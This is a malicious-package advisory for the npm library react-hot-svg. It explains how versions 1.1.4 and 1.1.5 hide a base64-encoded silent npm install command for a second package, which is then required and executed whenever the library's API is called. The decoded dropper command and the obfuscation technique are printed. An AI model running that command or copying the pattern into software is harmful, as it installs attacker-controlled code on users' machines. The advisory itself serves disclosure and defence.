VYPR

npm · Malicious package advisory

Malware

react-hot-svg

MAL-2026-10439

Malicious code in react-hot-svg (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (847fe0ea93982597b0611e6fd23f1b77af40b7162baf338659fbff8deb7fb051)
index.js in react-hot-svg 1.1.4 hides both a shell command and a package name as base64 strings named `svgValidateKey` and `svgValidatePattern`. When any of the exported API surface (`getPlugin`, `setPlugin`, `validateSvgContent`) is invoked, the code decodes `svgValidateKey` via `atob` to the string `npm install rollup-plugin-polyfill-handler --no-save --silent --no-audit --no-fund`, spawns it via `child_process.spawn` with `stdio: 'ignore'`, and on process exit `require()`s the base64-decoded module name `rollup-plugin-polyfill-handler` and immediately invokes its `.getPlugin()()` function. The `--no-save --silent --no-audit --no-fund` flags suppress output and prevent the added dependency from appearing in package.json or the lockfile. The obfuscation of both the command and the required module name, the SVG-themed cover identifiers, and the pattern of installing-then-requiring-then-executing an undeclared external package match a dropper that lands and executes attacker-controlled code from a separate npm package on any consumer who uses this library's advertised API.

Compromised versions (2)

  • 1.1.5
  • 1.1.4

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.